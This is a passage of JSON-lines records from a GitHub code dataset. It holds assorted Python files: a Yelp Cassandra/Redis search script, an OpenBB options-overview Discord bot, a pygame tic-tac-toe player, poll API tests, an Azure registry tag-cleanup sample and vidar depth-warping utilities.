background_del(OUTPUT_DIR)\n\n        self.sqlController.clear_file_log(self.animal, self.downsample, self.channel)\n","repo_name":"ActiveBrainAtlas2/preprocessing-pipeline","sub_path":"archive/pipeline/lib/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":9816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43669667698","text":"import pandas as pd\nimport numpy as np\nimport csv\nimport json\n\ndf = pd.read_csv('yelp_business.csv')#.astype({'stars': 'string'})\n\nprint('Dataset loaded.')\n\nprint('Starting Cassandra...')\n\nfrom cassandra.cluster import Cluster\nfrom cassandra import OperationTimedOut\ncluster = Cluster(['cassandra'])\nsession = cluster.connect()\n\nsession.execute(\n    \"CREATE KEYSPACE IF NOT EXISTS ks \"\n    \"WITH REPLICATION = { 'class' : 'SimpleStrategy', 'replication_factor' : 3 };\"\n)\n\nsession.set_keyspace('ks')\n\nsession.execute(\"\"\"\nCREATE TABLE business(\n    id text,\n    name text,\n    address text,\n    city text,\n    state text,\n    stars float,\n    review_count int,\n    is_open int,\n    categories text,\n    hours text,\n    PRIMARY KEY (id, name)\n);\n\"\"\")\n\nprint('Loading dataset to Cassandra...')\n\nquery = \"INSERT INTO business (id, name, address, city, state, stars, review_count, is_open, categories, hours) VALUES (?,?,?,?,?,?,?,?,?,?)\"\nprepared = session.prepare(query)\n\ntry:\n    for index, item in df.iterrows():\n        session.execute(prepared, (item[0], item[1], str(item[2]), item[3], item[4], item[8], item[9], item[10], item[11], item[12]))\nexcept OperationTimedOut:\n    pass\n\n\nprint('Cassandra table loaded.')\n#print('Enter City to search for:') #prompt\n\nstate = input('Enter State to search for:')\n\nprint('Searching for restaurants in '+state+'...')\n\nquery = \"\"\"\nSELECT id, name, address, city, state, stars, review_count, is_open, categories, hours\nFROM business\nWHERE state = %s and is_open 
= 1\nALLOW FILTERING;\n\"\"\"\n\n#rows = session.execute(query, ('Tempe', )) # input example Tempe for city\nrows = session.execute(query, (state, ))\n\nprint('Search results found. Exporting...')\n\nheader = ['id','name', 'address', 'city', 'state', 'stars', 'review_count', 'categories', 'hours']\n\nwith open('test.csv', 'w') as fp:\n    writer = csv.writer(fp, delimiter=',')\n    writer.writerow(header)\n    for row in rows:\n        writer.writerow([row.id, row.name, row.address, row.city, row.state, row.stars, row.review_count, row.categories, row.hours])\n\nprint('Results exported to test.csv, starting subquery...')\n    \nsession.execute(\"\"\"\nDROP TABLE business;\n\"\"\")\n\ncdf = pd.read_csv('test.csv')\n\nimport redis\nr = redis.Redis(host='my-redis', port=6379, db=0,decode_responses=True)\n\npipe = r.pipeline()\nfor i in range(len(cdf)):\n    id_ = i\n    pipe.hmset(id_, {'business_id': cdf['id'][i],\n                 'name': cdf['name'][i],\n                 'address': cdf['address'][i],\n                 'city': cdf['city'][i], \n                 'state': cdf['state'][i],\n                 'stars': float(cdf['stars'][i]),\n                 'review_count': int(cdf['review_count'][i]),\n                 'categories': cdf['categories'][i],\n                 'hours': cdf['hours'][i]})\n    pipe.zadd(cdf['city'][i], {id_:i})\npipe.execute()\n\ncity = input('Enter City to search for:')\n\nwith open('test.json', 'w') as f:\n    for x in r.zrangebyscore(city, 0, len(cdf)):\n        pipe.hgetall(x)\n        json.dump(pipe.execute(),f)\n\n","repo_name":"nap015/Yelp-Business-Search","sub_path":"dsc104final.py","file_name":"dsc104final.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33283682772","text":"# Example 1\n# 'else' after for loop - executes after the for loop finishes (if not exited by 'break' !)\nfor n in range(2,10):\n    for x in range (2, n):\n        if n % x == 0:\n            print(n, 'equals', x, '*', n//x)\n            break\n    else:\n        print(n, 'is a prime number')\n\n\n# Example 2\n# 'continue' goes to the next iteration of the loop\nfor n in range(2,10):\n    if n % 2 == 0:\n        print(n, 'is even number')\n        continue\n    print(n, 'is odd number')\n\n# Example 3\n# Using a copy of a list while iterating over it by slice [:]\n# Without the copy it would be an infinite loop\nmylist = ['this', 'is', 'cool', 'construction']\nfor item in mylist[:]:\n    if len(item)>5:\n        mylist.insert(0, item)\nprint(mylist)\n","repo_name":"vafliik/pytutorials","sub_path":"for_tutorial.py","file_name":"for_tutorial.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15717988067","text":"import logging\nimport os\nimport time\nfrom functools import reduce\nfrom multiprocessing import Pool\n\nimport disnake\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objects as go\nimport yfinance as yf\n\nfrom bots import imps\nfrom openbb_terminal.decorators import log_start_end\nfrom openbb_terminal.stocks.options import op_helpers, yfinance_model\nfrom openbb_terminal.stocks.options.barchart_model import get_options_info\n\n# pylint: disable=W0640,W0631\nlogger = logging.getLogger(__name__)\n\n\ndef unpack(tup):\n\n    return reduce(np.append, tup)\n\n\ncolumn_map = {\"openInterest\": \"oi\", \"volume\": \"vol\", \"impliedVolatility\": \"iv\"}\ncolumns = [\n    \"strike\",\n    \"bid\",\n    \"ask\",\n    \"volume\",\n    \"openInterest\",\n    \"impliedVolatility\",\n]\n\n\n# pylint: disable=R0912,R0913,R0914,R0915\n@log_start_end(log=logger)\ndef options_run(\n    ticker,\n    url,\n    expiry,\n    dates,\n    df_bcinfo,\n    
calls,\n puts,\n df_opt,\n current_price,\n min_strike,\n max_strike,\n min_strike2,\n max_strike2,\n max_pain,\n):\n \"\"\"Options Overview\"\"\"\n titles, reports, embeds, embeds_img, choices, images_list = [], [], [], [], [], []\n fig = go.Figure()\n\n dmax = df_opt[[\"OI_call\", \"OI_put\"]].values.max()\n dmin = df_opt[[\"OI_call\", \"OI_put\"]].values.min()\n fig.add_trace(\n go.Scatter(\n x=df_opt.index,\n y=df_opt[\"OI_call\"],\n name=\"Calls\",\n mode=\"lines+markers\",\n line=dict(color=\"#00ACFF\", width=3),\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=df_opt.index,\n y=df_opt[\"OI_put\"],\n name=\"Puts\",\n mode=\"lines+markers\",\n line=dict(color=\"#e4003a\", width=3),\n )\n )\n fig.add_trace(\n go.Scatter(\n x=[current_price, current_price],\n y=[dmin, dmax],\n mode=\"lines\",\n line=dict(color=\"gold\", width=2),\n name=\"Current Price\",\n )\n )\n fig.add_trace(\n go.Scatter(\n x=[max_pain, max_pain],\n y=[dmin, dmax],\n mode=\"lines\",\n line=dict(color=\"grey\", width=3, dash=\"dash\"),\n name=f\"Max Pain: {max_pain}\",\n )\n )\n if imps.PLT_WATERMARK:\n fig.add_layout_image(imps.PLT_WATERMARK)\n fig.update_xaxes(\n range=[min_strike, max_strike],\n constrain=\"domain\",\n )\n fig.update_layout(\n margin=dict(l=0, r=0, t=60, b=20),\n template=imps.PLT_SCAT_STYLE_TEMPLATE,\n title=f\"Open Interest for {ticker.upper()} expiring {expiry}\",\n title_x=0.5,\n legend_title=\"\",\n xaxis_title=\"Strike\",\n yaxis_title=\"Open Interest (1k)\",\n xaxis=dict(\n rangeslider=dict(visible=False),\n ),\n font=imps.PLT_FONT,\n legend=dict(yanchor=\"top\", y=0.99, xanchor=\"left\", x=0.01),\n dragmode=\"pan\",\n )\n\n imagefile = \"opt-oi.png\"\n\n plt_link = \"\"\n if imps.INTERACTIVE:\n plt_link = imps.inter_chart(fig, imagefile, callback=False)\n reports.append(plt_link)\n\n fig.update_layout(\n width=800,\n height=500,\n )\n\n imagefile = imps.image_border(imagefile, fig=fig)\n\n if imps.IMAGES_URL or not imps.IMG_HOST_ACTIVE:\n image_link_oi = imps.multi_image(imagefile)\n images_list.append(imagefile)\n else:\n image_link_oi = imps.multi_image(imagefile)\n\n calls_df = calls[columns].rename(columns=column_map)\n calls_df = calls_df[calls_df[\"strike\"] >= min_strike2]\n calls_df = calls_df[calls_df[\"strike\"] <= max_strike2]\n calls_df[\"iv\"] = pd.to_numeric(calls_df[\"iv\"].astype(float))\n\n formats = {\"iv\": \"{:.2f}\"}\n for col, f in formats.items():\n calls_df[col] = calls_df[col].map(lambda x: f.format(x))\n\n calls_df = calls_df.fillna(\"\")\n calls_df.set_index(\"strike\", inplace=True)\n\n if \"^\" not in ticker:\n if \"-\" in df_bcinfo.iloc[0, 1]:\n iv = f\"```diff\\n- {df_bcinfo.iloc[0, 1]}\\n```\"\n else:\n iv = f\"```yaml\\n {df_bcinfo.iloc[0, 1]}\\n```\"\n\n pfix, sfix = f\"{ticker.upper()} \", f\" expiring {expiry}\"\n if expiry == dates[0]:\n pfix = f\"{ticker.upper()} Weekly \"\n sfix = \"\"\n\n titles.append(\n f\"{ticker.upper()} Overview\",\n )\n titles.append(\n f\"{pfix}Open Interest{sfix}\",\n )\n embeds.append(\n disnake.Embed(\n title=f\"{ticker.upper()} Overview\",\n color=imps.COLOR,\n ),\n )\n embeds.append(\n disnake.Embed(\n title=f\"{pfix}Open Interest{sfix}\",\n description=plt_link,\n colour=imps.COLOR,\n ),\n )\n choices.append(\n disnake.SelectOption(label=f\"{ticker.upper()} Overview\", value=\"0\", emoji=\"🟢\"),\n )\n choices.append(\n disnake.SelectOption(label=f\"{pfix}Open Interest{sfix}\", value=\"1\", emoji=\"🟢\"),\n )\n\n i, i2, end = 0, 0, 20\n df_calls = []\n dindex = len(calls_df.index)\n while i < dindex:\n df_calls = 
calls_df.iloc[i:end]\n df_calls.append(df_calls)\n figc = imps.plot_df(\n df_calls,\n fig_size=(1000, (40 + (40 * 20))),\n col_width=[3, 3, 3, 3],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n imagefile = \"opt-calls.png\"\n imagefile = imps.save_image(imagefile, figc)\n\n if imps.IMAGES_URL or not imps.IMG_HOST_ACTIVE:\n image_link = imps.multi_image(imagefile)\n images_list.append(imagefile)\n else:\n image_link = imps.multi_image(imagefile)\n\n embeds_img.append(\n f\"{image_link}\",\n )\n titles.append(\n f\"{pfix}Calls{sfix}\",\n )\n embeds.append(\n disnake.Embed(\n title=f\"{pfix}Calls{sfix}\",\n colour=imps.COLOR,\n ),\n )\n i2 += 1\n i += 20\n end += 20\n\n # Add Calls page field\n i, page, puts_page = 2, 0, 3\n i3 = i2 + 2\n choices.append(\n disnake.SelectOption(label=\"Calls Page 1\", value=\"2\", emoji=\"🟢\"),\n )\n for i in range(2, i3):\n page += 1\n puts_page += 1\n\n embeds[i].add_field(name=f\"Calls Page {page}\", value=\"_ _\", inline=True)\n\n puts_df = puts[columns].rename(columns=column_map)\n\n puts_df = puts_df[puts_df[\"strike\"] >= min_strike2]\n puts_df = puts_df[puts_df[\"strike\"] <= max_strike2]\n\n puts_df[\"iv\"] = pd.to_numeric(puts_df[\"iv\"].astype(float))\n\n formats = {\"iv\": \"{:.2f}\"}\n for col, f in formats.items():\n puts_df[col] = puts_df[col].map(lambda x: f.format(x)) # pylint: disable=W0640\n\n puts_df = puts_df.fillna(\"\")\n puts_df.set_index(\"strike\", inplace=True)\n\n pfix, sfix = f\"{ticker.upper()} \", f\" expiring {expiry}\"\n if expiry == dates[0]:\n pfix = f\"{ticker.upper()} Weekly \"\n sfix = \"\"\n\n # Puts Pages\n i, end = 0, 20\n df_puts = []\n\n dindex = len(puts_df.index)\n while i < dindex:\n df_puts = puts_df.iloc[i:end]\n df_puts.append(df_puts)\n figp = imps.plot_df(\n df_puts,\n fig_size=(1000, (40 + (40 * 20))),\n col_width=[3, 3, 3, 3],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n imagefile = \"opt-puts.png\"\n imagefile = imps.save_image(imagefile, figp)\n\n if imps.IMAGES_URL or not imps.IMG_HOST_ACTIVE:\n image_link = imps.multi_image(imagefile)\n images_list.append(imagefile)\n else:\n image_link = imps.multi_image(imagefile)\n\n embeds_img.append(\n f\"{image_link}\",\n )\n titles.append(\n f\"{pfix}Puts{sfix}\",\n )\n embeds.append(\n disnake.Embed(\n title=f\"{pfix}Puts{sfix}\",\n colour=imps.COLOR,\n ),\n )\n i2 += 1\n i += 20\n end += 20\n\n # Add Puts page field\n i, page = 0, 0\n puts_page -= 1\n i2 += 2\n choices.append(\n disnake.SelectOption(label=\"Puts Page 1\", value=f\"{puts_page}\", emoji=\"🟢\"),\n )\n for i in range(puts_page, i2):\n page += 1\n embeds[i].add_field(name=f\"Puts Page {page}\", value=\"_ _\", inline=True)\n\n # Author/Footer\n for i in range(0, i2):\n embeds[i].set_author(\n name=imps.AUTHOR_NAME,\n url=imps.AUTHOR_URL,\n icon_url=imps.AUTHOR_ICON_URL,\n )\n embeds[i].set_footer(\n text=imps.AUTHOR_NAME,\n icon_url=imps.AUTHOR_ICON_URL,\n )\n\n # Set images to Pages\n i = 0\n img_i = 0\n embeds[1].set_image(url=image_link_oi)\n for i in range(2, i2):\n embeds[i].set_image(url=embeds_img[img_i])\n img_i += 1\n i += 1\n\n if url:\n embeds[0].set_thumbnail(url=f\"{url}\")\n else:\n embeds[0].set_thumbnail(url=imps.AUTHOR_ICON_URL)\n\n # Overview Section\n if \"^\" not in ticker:\n reports.append(\n f\"{'':^5}*{df_bcinfo.iloc[0, 
0]:^25}*{'':^5}*{df_bcinfo.iloc[1, 0]:^25}*{'':^5}\\n\"\n )\n reports.append(\n f\"{'':^8}{df_bcinfo.iloc[0, 1]:^25}{'':^5}{df_bcinfo.iloc[1, 1]:^25}\\n\"\n )\n i, i2 = 2, 3\n while i < 11:\n text = (\n f\"{'':^5}*{df_bcinfo.iloc[i, 0]:^25}*{'':^5}*{df_bcinfo.iloc[i2, 0]:^25}*{'':^5}\\n\"\n f\"{'':^5}{df_bcinfo.iloc[i, 1]:^30}{'':^5}{df_bcinfo.iloc[i2, 1]:^25}{'':^10}\\n\"\n )\n reports.append(text)\n i += 1\n i2 += 1\n\n embeds[0].add_field(name=f\"{df_bcinfo.iloc[0, 0]}\", value=iv, inline=False)\n embeds[0].add_field(\n name=f\"•{df_bcinfo.iloc[1, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[1, 1]}\\n```\",\n inline=True,\n )\n\n for N in range(2, 6):\n embeds[0].add_field(\n name=f\"_ _ _ _ _ _ _ _ _ _ •{df_bcinfo.iloc[N, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[N, 1]}\\n```\",\n inline=True,\n )\n\n embeds[0].add_field(name=\"_ _\", value=\"_ _\", inline=False)\n for N in range(6, 8):\n embeds[0].add_field(\n name=f\"_ _ _ _ _ _ _ _ _ _ •{df_bcinfo.iloc[N, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[N, 1]}\\n```\",\n inline=True,\n )\n\n embeds[0].add_field(name=\"_ _\", value=\"_ _\", inline=False)\n for N in range(8, 10):\n embeds[0].add_field(\n name=f\"_ _ _ _ _ _ _ _ _ _ •{df_bcinfo.iloc[N, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[N, 1]}\\n```\",\n inline=True,\n )\n\n embeds[0].add_field(name=\"_ _\", value=\"_ _\", inline=False)\n for N in range(10, 12):\n embeds[0].add_field(\n name=f\"_ _ _ _ _ _ _ _ _ _ •{df_bcinfo.iloc[N, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[N, 1]}\\n```\",\n inline=True,\n )\n\n embeds[0].set_footer(text=f\"Page 1 of {len(embeds)}\")\n\n return titles, reports, embeds, choices, embeds_img, images_list\n\n\n@log_start_end(log=logger)\ndef options_data(\n ticker: str = None,\n expiry: str = None,\n min_sp: float = None,\n max_sp: float = None,\n):\n\n # Debug\n if imps.DEBUG:\n logger.debug(\"opt overview %s %s %s %s\", ticker, expiry, min_sp, max_sp)\n\n # Check for argument\n if ticker is None:\n raise Exception(\"Stock ticker is required\")\n\n # Get options info/dates, Look for logo_url\n if \"^\" not in ticker:\n df_bcinfo = get_options_info(ticker) # Barchart Options IV Overview\n df_bcinfo = df_bcinfo.fillna(\"\")\n df_bcinfo = df_bcinfo.set_axis(\n [\n \" \",\n \"\",\n ],\n axis=\"columns\",\n )\n df_bcinfo[\"\"] = df_bcinfo[\"\"].str.lstrip()\n else:\n df_bcinfo = \"\"\n\n dates = yfinance_model.option_expirations(ticker) # Expiration dates\n tup = f\"{ticker.upper()}\"\n url = yf.Ticker(tup).info[\"logo_url\"]\n url += \"?raw=true\" if url else \"\"\n\n if not dates:\n raise Exception(\"Stock ticker is invalid\")\n\n options = yfinance_model.get_option_chain(ticker, str(expiry))\n calls = options.calls.fillna(0)\n puts = options.puts.fillna(0)\n\n current_price = yfinance_model.get_price(ticker)\n\n min_strike2 = np.percentile(calls[\"strike\"], 1)\n max_strike2 = np.percentile(calls[\"strike\"], 100)\n min_strike = 0.75 * current_price\n max_strike = 1.95 * current_price\n\n if len(calls) > 40:\n min_strike = 0.75 * current_price\n max_strike = 1.25 * current_price\n\n if min_sp:\n min_strike = min_sp\n min_strike2 = min_sp\n if max_sp:\n max_strike = max_sp\n max_strike2 = max_sp\n if min_sp > max_sp: # type: ignore\n min_sp, max_sp = max_strike2, min_strike2\n\n call_oi = calls.set_index(\"strike\")[\"openInterest\"] / 1000\n put_oi = puts.set_index(\"strike\")[\"openInterest\"] / 1000\n\n df_opt = pd.merge(call_oi, put_oi, left_index=True, right_index=True)\n df_opt = df_opt.rename(\n columns={\"openInterest_x\": \"OI_call\", 
\"openInterest_y\": \"OI_put\"}\n )\n\n max_pain = op_helpers.calculate_max_pain(df_opt)\n data = [\n ticker,\n url,\n expiry,\n dates,\n df_bcinfo,\n calls,\n puts,\n df_opt,\n current_price,\n min_strike,\n max_strike,\n min_strike2,\n max_strike2,\n max_pain,\n ]\n return data\n\n\n@log_start_end(log=logger)\ndef run(\n ticker: str = None,\n expiry: str = None,\n min_sp: float = None,\n max_sp: float = None,\n):\n cpus = os.cpu_count()\n data = options_data(ticker, expiry, min_sp, max_sp)\n with Pool(processes=cpus) as p:\n time.sleep(1)\n titles, reports, embeds, choices, embeds_img, images_list = zip(\n *p.starmap(options_run, [(*data,)], chunksize=1)\n )\n\n return (\n unpack(titles),\n unpack(reports),\n unpack(embeds),\n unpack(choices),\n unpack(embeds_img),\n unpack(images_list),\n )\n\n\n@log_start_end(log=logger)\ndef overview_command(\n ticker: str = None,\n expiry: str = None,\n min_sp: float = None,\n max_sp: float = None,\n):\n \"\"\"Options Overview\"\"\"\n\n titles, reports, embeds, choices, embeds_img, images_list = run(\n ticker, expiry, min_sp, max_sp\n )\n description = f\"```\\n{''.join(reports)}\\n```\"\n\n return {\n \"view\": imps.Menu,\n \"titles\": titles,\n \"description\": description,\n \"embed\": embeds,\n \"choices\": choices,\n \"embeds_img\": embeds_img,\n \"images_list\": images_list,\n }\n","repo_name":"rohankumardubey/OpenBBTerminal","sub_path":"bots/stocks/options/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":14958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"41031506793","text":"import pygame\nimport config\n\nclass Player:\n def __init__(self,symbol,color) -> None:\n self.score=0\n self.color=color\n self.symbol=symbol\n\n def drawSymbol(self,posx,posy,screen):\n if(self.symbol=='O'):\n print(\"Turn for Player-1\")\n x=posx+config.BLOCKWIDTH//2\n y=posy+config.BLOCKHEIGHT//2\n radius=config.BLOCKWIDTH//2-10\n pygame.draw.circle(screen,self.color,(x,y),radius)\n #set the position of the circle to the middle of the clicked square \n # draw circle of radius half of the rectangle width -1\n return self.symbol\n elif(self.symbol=='X'):\n print(\"Turn for Player-2\")\n spacing=10\n pygame.draw.lines(screen, self.color, False, [(posx+spacing,posy+spacing),(posx+config.BLOCKWIDTH-spacing,posy+config.BLOCKHEIGHT-spacing)],10)\n #draw line from the left upper corner to lower right corner \n pygame.draw.lines(screen, self.color, False, [(posx+config.BLOCKWIDTH-spacing,posy+spacing),(posx+spacing,posy+config.BLOCKHEIGHT-spacing)], 10)\n #draws line form the right upper corner to lower left corner\n return self.symbol\n pass","repo_name":"jawad-003/TicTacToe","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42598910532","text":"\"\"\"\n Tests for Poll Resource\n\"\"\"\nimport json\n\nimport requests\n\nfrom sample import make_mock_poll, poll_url\nfrom test_setup import ApiTestCase\n\n\nclass PollTest(ApiTestCase):\n\n def test_create_poll(self):\n \"\"\"Test Poll Creation\"\"\"\n mock_request = make_mock_poll()\n _req = requests.post(poll_url, json=json.dumps(mock_request))\n req = json.loads(_req.json())\n expected = mock_request\n expected['total_votes'] = '8'\n self.assertDictEqual(req, expected)\n\n def test_poll_vote(self):\n \"\"\"Test Poll Vote via Patch\"\"\"\n # Create Test Poll\n mock_poll = make_mock_poll()\n 
_req = requests.post(poll_url, json=json.dumps(mock_poll))\n req = json.loads(_req.json())\n # Setup Fake 'Vote Action' for Poll\n mock_url = f\"{poll_url}/{req['pollId']}\"\n mock_request = {\n \"answers\": [\n {\n \"answerId\": \"0\",\n \"votes\": \"6\" # Increased from default 5\n },\n {\n \"answerId\": \"1\",\n \"votes\": \"3\"\n },\n ]\n }\n expected = req\n expected['answers'][0] = mock_request['answers'][0]\n expected['answers'][0]['answer'] = 'Yes'\n expected['total_votes'] = '9'\n _req = requests.patch(mock_url, json=json.dumps(mock_request))\n req = _req.json()\n self.assertDictEqual(req, expected)\n\n def test_poll_delete(self):\n \"\"\"Test Poll Deletion\"\"\"\n mock_poll = make_mock_poll()\n _req = requests.post(poll_url, json=json.dumps(mock_poll))\n mock_url = f\"{poll_url}/{mock_poll['pollId']}\"\n req = requests.delete(mock_url)\n self.assertEqual(req.status_code, 204)\n get_req = requests.get(mock_url)\n self.assertEqual(get_req.status_code, 404)\n","repo_name":"WarriorBeat/WarriorBeatApi","sub_path":"tests/test_poll.py","file_name":"test_poll.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"43108143836","text":"import asyncio\nfrom dotenv import find_dotenv, load_dotenv\nimport os\n\nfrom azure.containerregistry import TagOrder\nfrom azure.containerregistry.aio import ContainerRegistryClient\nfrom azure.identity.aio import DefaultAzureCredential\n\n\nclass DeleteTagsAsync(object):\n def __init__(self):\n load_dotenv(find_dotenv())\n\n async def delete_tags(self):\n # [START list_repository_names]\n audience = \"https://management.azure.com\"\n account_url = os.environ[\"CONTAINERREGISTRY_ENDPOINT\"]\n credential = DefaultAzureCredential()\n client = ContainerRegistryClient(account_url, credential, audience=audience)\n\n async with client:\n async for repository in client.list_repository_names():\n print(repository)\n # [END list_repository_names]\n\n # [START list_tag_properties]\n # Keep the three most recent tags, delete everything else\n tag_count = 0\n async for tag in client.list_tag_properties(repository, order_by=TagOrder.LAST_UPDATE_TIME_DESCENDING):\n tag_count += 1\n if tag_count > 3:\n await client.delete_tag(repository, tag.name)\n # [END list_tag_properties]\n\n\nasync def main():\n sample = DeleteTagsAsync()\n await sample.delete_tags()\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"mirespace/python-azure","sub_path":"sdk/containerregistry/azure-containerregistry/samples/async_samples/sample_delete_tags_async.py","file_name":"sample_delete_tags_async.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21721664680","text":"import torch\n\nfrom vidar.utils.data import make_list, get_from_dict, update_dict\nfrom vidar.utils.flow_triangulation_support import bearing_grid, mult_rotation_bearing, triangulation\nfrom vidar.utils.tensor import pixel_grid, norm_pixel_grid, unnorm_pixel_grid, grid_sample\nfrom vidar.utils.types import is_dict, is_list\n\n\ndef warp_from_coords(tensor, coords, mode='bilinear', padding_mode='zeros'):\n \"\"\"Warp an image from a coordinate map\"\"\"\n # Sample grid from data with coordinates\n warp = grid_sample(tensor, coords.permute(0, 2, 3, 1), mode=mode, padding_mode=padding_mode)\n # Returned warped tensor\n return warp\n\n\ndef 
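The delete_tags sample above keeps the three most recent tags by counting through a newest-first listing. The retention rule itself can be factored out and checked without any Azure calls; a minimal sketch:

```python
from typing import Iterable, List

def select_stale(tags_newest_first: Iterable[str], keep: int = 3) -> List[str]:
    """With tags iterated newest-first (as LAST_UPDATE_TIME_DESCENDING
    returns them above), everything past the first `keep` entries is
    due for deletion."""
    stale: List[str] = []
    for count, tag in enumerate(tags_newest_first, start=1):
        if count > keep:
            stale.append(tag)
    return stale

assert select_stale(["v5", "v4", "v3", "v2", "v1"]) == ["v2", "v1"]
```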
coords_from_optical_flow(optflow):\n \"\"\"Get coords from optical flow\"\"\"\n # Create coordinate with optical flow\n coords = pixel_grid(optflow, device=optflow) + optflow\n # Normalize and return coordinate grid\n return norm_pixel_grid(coords)\n\n\ndef warp_depth_from_motion(ctx_depth, ctx_cam, tgt_depth, tgt_cam,\n tgt_scnflow=None, tgt_world_scnflow=None,\n ctx_scnflow=None, ctx_world_scnflow=None):\n \"\"\"Warp depth map given motion between two cameras\"\"\"\n if is_list(ctx_depth) and is_list(tgt_depth):\n return [warp_depth_from_motion(\n ctx_depth[i], ctx_cam, tgt_depth[i], tgt_cam,\n None if tgt_scnflow is None else tgt_scnflow[i],\n None if tgt_world_scnflow is None else tgt_world_scnflow[i],\n None if ctx_scnflow is None else ctx_scnflow[i],\n None if ctx_world_scnflow is None else ctx_world_scnflow[i],\n ) for i in range(len(ctx_depth))]\n ctx_depth_warped = reproject_depth_from_motion(\n ctx_depth, ctx_cam, tgt_cam, ctx_scnflow=ctx_scnflow, ctx_world_scnflow=ctx_world_scnflow)\n return warp_from_motion(ctx_depth_warped, ctx_cam, tgt_depth, tgt_cam, tgt_scnflow, tgt_world_scnflow)\n\n\ndef reproject_depth_from_motion(ctx_depth, ctx_cam, tgt_cam, ctx_scnflow=None, ctx_world_scnflow=None):\n \"\"\"Reproject depth map given motion between two cameras\"\"\"\n ctx_points = ctx_cam.reconstruct_depth_map(\n ctx_depth, to_world=True, scene_flow=ctx_scnflow, world_scene_flow=ctx_world_scnflow)\n return tgt_cam.project_points(ctx_points, from_world=True, return_z=True)[1]\n\n\ndef warp_from_motion(ctx_rgb, ctx_cam, tgt_depth, tgt_cam, tgt_scnflow=None, tgt_world_scnflow=None):\n \"\"\"Warp image given motion between two cameras\"\"\"\n tgt_points = tgt_cam.reconstruct_depth_map(\n tgt_depth, to_world=True, scene_flow=tgt_scnflow, world_scene_flow=tgt_world_scnflow)\n return warp_from_coords(ctx_rgb, ctx_cam.project_points(tgt_points, from_world=True).permute(0, 3, 1, 2))\n\n\ndef coords_from_motion(ctx_cam, tgt_depth, tgt_cam, tgt_scnflow=None, tgt_world_scnflow=None):\n \"\"\"Get coords from motion between two cameras\"\"\"\n if is_list(ctx_cam):\n return [coords_from_motion(camera, tgt_depth, tgt_cam)\n for camera in ctx_cam]\n # If there are multiple depth maps, iterate for each\n if is_list(tgt_depth):\n return [coords_from_motion(ctx_cam, depth, tgt_cam)\n for depth in tgt_depth]\n world_points = tgt_cam.reconstruct_depth_map(\n tgt_depth, to_world=True, scene_flow=tgt_scnflow, world_scene_flow=tgt_world_scnflow)\n return ctx_cam.project_points(world_points, from_world=True).permute(0, 3, 1, 2)\n\n\ndef optflow_from_motion(ctx_cam, tgt_depth, tgt_cam, tgt_scnflow=None, tgt_world_scnflow=None):\n \"\"\"Get optical flow from motion between two cameras\"\"\"\n if is_list(tgt_depth):\n return [optflow_from_motion(\n ctx_cam, tgt_depth[i], tgt_cam,\n tgt_scnflow[i] if tgt_scnflow is not None else None,\n tgt_world_scnflow[i] if tgt_world_scnflow is not None else None,\n ) for i in range(len(tgt_depth))]\n # coords = ctx_cam.coords_from_depth(\n # tgt_depth, tgt_cam, scene_flow=tgt_scnflow, world_scene_flow=tgt_world_scnflow).permute(0, 3, 1, 2)\n coords = coords_from_motion(\n ctx_cam, tgt_depth, tgt_cam, tgt_scnflow=tgt_scnflow, tgt_world_scnflow=tgt_world_scnflow)\n return optflow_from_coords(coords)\n\n\ndef optflow_from_coords(coords):\n \"\"\"Get optical flow from coordinates\"\"\"\n return unnorm_pixel_grid(coords) - pixel_grid(coords, device=coords)\n\n\ndef warp_from_optflow(ctx_rgb, tgt_optflow):\n \"\"\"Warp image given optical flow\"\"\"\n coords = 
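warp_from_coords and coords_from_optical_flow above lean on vidar's pixel-grid helpers. A self-contained sketch of the same warp in plain PyTorch (build the pixel grid, add the flow, normalise to [-1, 1], sample); this assumes a recent torch with the meshgrid indexing argument and is not the vidar implementation itself:

```python
import torch
import torch.nn.functional as F

def warp_with_flow(img: torch.Tensor, flow: torch.Tensor) -> torch.Tensor:
    """Warp img [B,C,H,W] by a pixel-offset flow [B,2,H,W] (x offset first)."""
    _, _, h, w = img.shape
    ys, xs = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij")
    grid = torch.stack((xs, ys), dim=0).float().unsqueeze(0) + flow  # [B,2,H,W]
    grid[:, 0] = 2.0 * grid[:, 0] / max(w - 1, 1) - 1.0  # x -> [-1, 1]
    grid[:, 1] = 2.0 * grid[:, 1] / max(h - 1, 1) - 1.0  # y -> [-1, 1]
    return F.grid_sample(img, grid.permute(0, 2, 3, 1), align_corners=True)

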